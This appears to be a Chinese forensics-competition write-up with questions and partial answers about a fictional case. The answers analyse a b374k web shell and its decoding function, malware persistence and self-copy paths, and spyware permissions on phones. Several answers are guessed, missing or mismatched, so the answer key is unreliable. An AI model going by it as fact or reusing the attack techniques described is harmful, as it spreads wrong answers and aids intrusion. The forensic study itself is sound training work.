[多选题] 在网页服务器中，哪个是可疑档案?它如何取得计算机控制权? (3 分)
A. 可疑档案: b6778k-9.0.php
B. 可疑档案: b374k-2.5.php
C. 可疑档案: upload.php
D. 透过浏览器远程管理取得计算机控制权
E. 透过 PuTTY(远程登录工具) 取得计算机控制权

B374k 是个很有名的大马，看看源代码也能看出来，大马是有 web 端的操作界面，搭一
下环境，看看大马界面，所以应该是透过浏览器远程管理取得计算机控制权。
[填空题] 在网页服务器中，运行可疑档案需要密码，其密码的哈希值(Hash Value)是
甚么? (请以英文全大写及阿拉伯数字回答) (3 分)
[单选题] 在网页服务器中，可疑档案的译码函数是甚么? (2 分)

C. gzinflate(base64_decode($x))
[填空题] 解压后的脚本档的档案大小是多少? (请以字节及阿拉伯数字回答) (3 分)
```
 
```
[多选题] 解压后的脚本文件内有甚么功能? (3 分)
A. 编辑文件
B. 删除文件
C. 更改用户密码
D. 加密文件
E. 重新命名文件
[单选题] 解压后的脚本含有压缩功能，当中使用的解压方法是甚么? (2 分)
[多选题] 特普的电话中一张于 2021 年09 月 30 日 10:45:12 拍摄的相片包含以下哪些
字? (1 分)

扫一下就有
[多选题] 特普的电话中的 whatsapp 账号 85268421495@s.whatsapp.net 中，有哪些其他人的 WhatsApp 用户数据记录? ) (2 分)
[单选题] 特普电话的热点分享密码是什么? (1 分)
[多选题] 特普于经纬度 22.278843, 114.165783，没有做什么? (2 分)

A. 拍影片
B. 拍照
C. 使用 google map
D. 在 Whatsapp 中分享实时位置
在这个位置，他只进行了拍照，所以选择 ACD。
[多选题] 特普于电话中安装了一个可疑软件(版本为 2020033001)，跟据该可疑软件的
安装档，下列哪项描述正确? (2 分)

A. 软件名称是安全防护
B. 软件名称是安心回家
C. 软件签名(signAlgorithm)以 SHA512withRSA 加密
D. 封包名称(packageName)是 org.chromium.webapk.a5b80edf82b436506_v2
[多选题] 特普于电话中安装了一个可疑软件(版本为 2020033001)，跟据该可疑软件的
安装档，可疑软件中涉及以下安全许可? (2 分)

A. android.permission.READ_SMS 读取短信内容
B. android.permission.SEND_SMS 发送短信
C. android.permission.READ_CONTACTS 读取联系人
D. android.permission.BLUETOOTH 使用蓝牙
E. android.permission.CLEAR_APP_CACHE 清除应用缓存
[填空题] 特普可能在电话中被可疑软件窃取了的验证码是什么? (请以英文全大写及阿
拉伯数字回答) (2 分)

113476
[填空题] 特普的计算机可能中了病毒，病毒的加壳(Packing)方法是甚么? (请以英文全
大写作答) (2 分)
[单选题] 特普的计算机可能中了病毒，病毒的编译工具是甚么? (2 分)
A. GCC
B. Borland
C. TCC
D. Microsoft Visual C/C++
同上题方法，用脱壳工具脱壳，使用 PEID 查到编译的工具是 D 选项
[填空题] 特普的计算机可能中了病毒，病毒的编译者使用可能使用的账户名称是甚么?
(请以英文全大写作答) (3 分)
GPGF
使用 ida pro 对已经脱壳的程序进行分析，找到病毒编译者使用的路径，找到他的账户名
称。
[单选题] 特普的计算机可能中了病毒，病毒的自我复制位置是甚么? (2 分)
A. C:\Temp\temp.txt
B. C:\Users\Desktop\malware.exe
C. C:\Users\public\malware.exe
D. C:\a.txt
使用火绒剑/Process Monitor 对其进行抓取。

通过后面的字符串格式 %s%c%s%c%s%s%c%c%c%c%s%c%c 并配合前面的 push 堆栈
指令，可以得出完整的目标路径 c:\\users\\public\\malware.exe
[单选题] 特普的计算机可能中了病毒，病毒的修改登录文件位置是甚么? (3 分)
A. HKLM\Software\Microsoft\Windows\CurrentVersion\Run
B. HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
C. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
D.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Backg
round
使用 ida pro 进行分析找到。
以下哪个不是病毒留下? (3 分)
A. HI
B. HELLO
C. HOW ARE YOU
D. GOODBYE

使用 ida pro 进行逆向分析，只获得了 HELLO 的艺术文字图。
[单选题] 特普的计算机可能中了病毒，病毒扰乱文件目标文件名是甚么? (2 分)
A. C:\Users\Documents\target.txt
B. C:\Users\Desktop\target.txt
C. C:\c.txt
D. C:\temp.txt
使用逆向分析工具 ida pro 找到该文件。
[单选题] 特普的计算机可能中了病毒，病毒扰乱文件方法是甚么? (3 分)
A. + 3
B. XOR 5
C. + 4
D. – 4
[填空题] 特普的计算机中，哪一个是 FTK Imager.exe 的程式编号(PID)? (请阿拉伯数
字回答) (1 分)
[多选题] 特普的计算机中，cmd.exe (PID: 4496) 它的执行日期及时间是? (1 分)
[填空题] 特普的计算机曾经以 FTP 对外.“)连接，连接的 IP 是? (请以阿拉伯数字回答，
不用输入".") (2 分)

这道题出现在内存题目中，第一反应使用 netscan 命令，对其连接的网络信息进行扫描，
但是在这里无法找到确凿证据说明是 ftp 连接。前往计算机镜像进行查找。
[多选题] 特普的计算机中，以下哪一个指令于上述连接中有使用过? (3 分)
A. get
B. put
C. delete
D. bye
E. quit

没有确凿证据，结合 ftp 命令猜测答案。
[多选题] 在 Linux 的"Volatility" 中，哪一个指令可以知道此程式支持哪一个 Windows
版本? (2 分)
A. vol.py --profile
B. vol.py --systeminfo
C. vol.py --info
D. vol.py --verinfo
[填空题] 常威手机中的Telegram有可能是在2021 年9 月24日 12 时44分58秒 (UTC
+8) 首次下载的。(请以阿拉伯数字输入答案) (2 分)
[填空题] 常威手机曾经连接的无人机名称是什么?(请以英文全大写及阿拉伯数字回答)
(1 分)
[填空题] 常威手机中，档案“dji1633936161416.mp4”的解像度是 ____ (例
如是 1920 x 1280，请输入 19201280)。 (1 分)

搜索该视频，很容易就找到了，但是 cellebrite 不太友好，居然没有视频分辨率，导出后
再查看详细信息，得到分辨率信息。
[填空题] 常威手机中，发现于网络上下载的软件“安心出行”安装档的哈希值(MD5)
是?(请以英文全大写及阿拉伯数字回答) (2 分)

0c3e9233b78971709ccaabe7d9a917e4
[多选题] 常威手机中执行软件“安心出行”(版本 2.1.3)中涉及以下安全许可? (2 分)
A. android.permission.ACCESS_WIFI_STATE 获取 WiFi 状态
B. android.permission.BATTERY_STATS 电量统计
C. android.permission.VIBRATE 使用振动
D. android.permission.CONTROL_LOCATION_UPDATES 控制定位更新
E. android.permission.CAMERA 拍照权限
[多选题] 常威手机中软件“安心出行”(版本 2.1.3)的安装档(.apk)中，哪个不是它的签名
算法? (3 分)
A. MD5withRSA
B. SHA256withRSA
C. SHA256withDSA
D. MD5withDSA
[多选题] 于常威的手机中执行软件“安心出行”(版本 1)可能会连接至哪一个网站? (2 分)
A. https://back-home-.pages.dev
B. org.chromium..a5b80edf82b436506
C. org.chromium..a5b80edf82b436506_v2
D. https://back-home-.pages.dev/manifest.json

抓包和分析源代码。
[单选题] 在常威苹果手提计算机, 用户开机密码是什么 ?(提示：常威 USB 设备中可
能有相关数据) (3 分)
A. Csthegoa
B. Drawfgdf
C. Cokkfiddd
D. Appiswon

根据提示，在常威的 USB 设备中查找。
使用取证大师，加载镜像后，使用格式化恢复，
[填空题] 在常威 U 盘内有多少磁盘分隔区 ? (请以阿拉伯数字回答) (2 分)

4
[填空题] 在常威 U 盘内有多少份 excel 文件 ? (请以阿拉伯数字回答) (1 分)
[填空题] 在常威 U 盘内, 内含有多少个客户数据 ? (请以阿拉伯数字回答) (1 分)
[多选题] 以下哪个客户数据储存在常威 U 盘内？ (3 分)
A. jmuat1@reference.com
B. cgeraudg@forbes.com
C. cwarmishamo@admin.ch
D. abddfdf@google.com
E. alex1234@apple.com

在xlsx里面搜索就有。
[单选题] 常威MAC 计算机上一个系统版本是甚么及现正运行哪一个版本的系统? (3分)
[多选题] 常威MAC 计算机的系统事件纪录内哪个卷标(Flag)是关于储存档案于计算机?
(3 分)
A. Created
B. InodeMetaMod
C. FinderInfoChanged
D. IsDirectory
E. OwnerChanged

Mac 电脑的 OSX FSEvents flag 知识，理论题目，选择 ABCE
[多选题] 常威 MAC 计算机曾连接哪一个无线网络 SSID? (2 分)
A. wai wifi
B. wanchainew1
C. central2
D. Hongkong1
[单选题] 常威MAC 计算机的使用者甚么时候将”隔空投送”(airdrop)转换至任何人模式?
(2 分)
[单选题] 常威 MAC 计算机的镜像档案内，总共有多少个系统默认的卷标? (1 分)
A. 4
B. 5
C. 6
D. 7

5个
[填空题] 常威 MAC 计算机的使用者上一次关闭浏览器时，正在浏览多少个网页? (请
以阿拉伯数字回答) (3 分)

虽然24个url，但是实际上有重复的，筛选后只有10个
[多选题] 常威 MAC 计算机中以下哪个档案并不是 iPhone 所拍摄的图片? (2 分)
A. IMG_0002
B. IMG_0003
C. IMG_0004
D. IMG_0005
E. IMG_0006

在 MAC 计算机上找到了 BCE 选项，导出，就能看到BCE都是iPhone12pro拍摄的
[多选题] 在常威的矿机没有进行哪种加密货币掘矿 ? (2 分)
A. Bitcoin（比特币）
B. Ethereum（以太坊）
C. RVN（渡鸦币）
D. Dodge（狗狗币）
E. ENJ（恩金币）
[填空题] 在常威矿机有几张显示适配器进行掘矿 ? (请以阿拉伯数字回答) (1 分)
[单选题] 在常威矿机, hive OS 操作系统是什么版本 ? (1 分)
A. 5.4.0
B. 6.0.1
C. 7.0.2
D. 10.0.2
E. 15.1.2*****
[多选题] 在常威矿机中, 哪个不是收取掘矿收益的加密货币钱包地址 ? (1 分)
[单选题] 在常威矿机中, 用于掘矿登入密码是什么 ? (2 分)
[填空题] 在常威矿机中,用于掘矿 Nvidia 显示适配器所使用的驱动程式使用什么版
本?(请以英文全大写及阿拉伯数字回答) (1 分)
[多选题] 在常威矿机中, 用于掘矿显示适配器型号包括什么? (2 分)
[多选题] 在常威矿机, 哪一天没有进行掘矿? (2 分)

直接看日志
[填空题] 常威的无人机中的飞航纪录 __可见到于 2021 年10 月11 日1505
时的 GPS 地点。(请以英文全大写及阿拉伯数字回答) (1 分)

FLY096.DAT
[单选题] 常威的无人机于 2021 年 10 月 11 日 15:07:51 时之间所在的地点是什么? (1
分)
[填空题] 常威的无人机哪一个档案有最后降落时间的数据(请以英文全大写及阿拉伯
数字回答,不用输入".")？ (1 分)

FLY096DAT

在最下面
[多选题] 常威的手机中哪一个是由常威的无人机于 2021 年 10 月 11 日所拍摄的图像
文件? (2 分)

A. Containers 货柜
B. Buildings 大厦
C. bicycle 单车
D. Mountain 山
[填空题] 常威的手机中显示常威的无人机DJI GO 4 的版本是 4.3.37?(请以阿拉伯数字
回答) (1 分)
[多选题] 常威的手机中所安装的 DJI GO 4 软件中，以下哪个 database 没有显示临时
禁飞区? (2 分)
A. Filesflysafe_app.db
B. Special_warning.db
C. Flysafe_app_dynamic_areas.db
D. Flysafe_polygon_1860.db

搜索找到数据库 Flysafe_app_dynamic_areas.db 显示了禁飞区，Special_warning.db 数据
库是空的。
[填空题] 常威的手机中在 Localappstate.db 可知道 DJI GO 4 的登入电子邮件(请以英
文全大写及阿拉伯数字回答) (1 分)

正常存储这个信息应该在 app 的数据库里，从 APP 找到跳转的路径。
[填空题] 常威的手机中在 flysafe_app_dynamic_areas.db 包含了名为server_timestamp 的资料(请以英文全大写及阿拉伯数字回答) (1 分)
和 82 题相关联，见过这个数据库，查看这个数据库
[单选题] 常威利用Windows 计算机中的 VM Kali 进行攻击和收取受害人电话的数据，请找出常威的 VM 存放地址 (2 分)
[单选题] 常威在收集数据后储存数据于 Windows 计算机一个名为"text2.txt"的档案中，
随后他将档案移往"\home\kali\Desktop\project\"中, 下述哪个档案可以证明这一点?

i)\root.bash_history ii) \home\kali.bash_history (3 分)

看 kali 系统里的数据，将 kali 的文件导出来，再当做计算机的检材做取证分析。
取证分析找到这两个文件，在\home\kali.bash_history 找到了 text2.txt 文件的痕迹但是
证明不了是从 windows 移动过去的，都没有相关证据。
[单选题] 常威 Windows 计算机中哪一个程式/档案有可能用作收取受害人电话上的数
据? (3 分)
A. \home\kali\Desktop\server_express_ok.js
B. \home\kali\Desktop\baddish\package.json
C. \home\kali\Desktop\baddish\server.js
D. \home\kali\Desktop\server.js
[多选题] 常威 Windows 计算机中显示常威第一次偷取受害人电话数据有机会是在哪
一个日子及时间登入 Kali 系统? (2 分)
A. 2021-09-27
B. 2021-09-29
C. 2021-09-29
D. 11:42:47
E. 16:04:24
F. 16:30:04
[多选题] 常威Windows计算机中以下哪一个檔案的哈希值(MD5)能证明常威曾开启存
有客户数据的档案? (2 分)
[单选题] 常威 Windows 计算机中，哪一个档案可以找到 USB 装置初次连接的时间?
(1 分)

C:\Windows\INF\setupapi.dev.log
Windows 取证理论题了，也可以根据选项打开找到该文件进行验证。
[单选题] 常威 Windows 计算机接驳了一个 3D 打印机，以下哪一个哈希值是属于上
述打印机的驱动程式文件中的安装信息文件(INF 檔)? (提示：关键词包含 CH341) (3 分)
[填空题] 续上题，上述安装信息文件的版本日期是什么? (请以阿拉伯数字，及以下格
式回答，例: 2019 年 3 月 4 日，请回答 20190304) (1 分)
[多选题] 常威 Windows 计算机安装了一些与 3D 打印机有关的软件，有可能是以下哪
个? (1 分)
A. Ultimaker Cura
B. 3DPrinterOS
C. Simplify3D
D. Creality Slicer

挨个找
[单选题] 续上题，哪一个档案记录了切片软件 Creality Slicer 曾经开启的 3d 立体模块
(.stl)纪录? (1 分)

C:\Users\Chris Paul\AppData\Roaming\Creality Slicer\4.8\Creality Slicer.log
[多选题] 续上题，哪一个 3d 立体模块(.stl)曾用切片软件 Creality Slicer 开启? (2 分)
[填空题] 哪一个是Wai_Linux1.E01 鉴证映像中Linux LVM 磁盘分区的长度? (请以阿
拉伯数字回答) (1 分)
[填空题] 常威 LINUX 计算机安装在逻辑卷管理(Logical Volume Manager)的磁盘分
区上, 哪一个是卷组(Volume group) 的通用唯一标识符(UUID)? (请以英文全大写及阿拉
伯数字回答，不用输入”-“) (1 分)
[多选题] 续上题，哪一个是逻辑卷(Logical Volume )设定的名字? (2 分)
[单选题] 常威 LINUX 计算机曾试用挖矿程式"T-Rex"，在相关脚本(script)中哪一个是
工人(worker)的名称? (1 分)

rig0
[填空题] LINUX 系统中利用 fdisk 指令下，下列哪一个是 "exFAT"的磁盘分区类型编
号(Partition type id)? (请以英文全大写及阿拉伯数字回答) (1 分)

7
这道题与本镜像无关，考的是 exfat 文件系统的 Partition type id，本镜像没有 exfat 分区，
考核这个理论知识点，答案是 7。
[单选题] 在 Linux 的环境下，以下哪一个指令用于激活扫描到的卷组(Volume group)
(1 分)
A. vgscan
B. vgchange
C. vgdisplay
D. vgactive
每个都用 --help 命令查一下，找到只有 vgchange 有这个功能
[单选题] 在 Linux 的环境下，下列哪一个指令可以删除内有档案的文件夹? (1 分

rm -rf
[填空题] 常威 LINUX 计算机逻辑滚动条 (Logical Volume) 路径“vg/home”使用了
甚么系统建立? (请以英文全大写回答) (2 分)

lvdisplay
[填空题] 常威 LINUX 计算机逻辑滚动条 (Logical Volume) 路径 “vg/root” 的
Current LE 是什么? (请以阿拉伯数字回答) (1 分)

lvdisplay
[填空题] 常威 LINUX 计算机扇区群组 (Volume group)的 Total PE 是甚么? (请以阿
拉伯数字回答) (1 分)

vgdisplay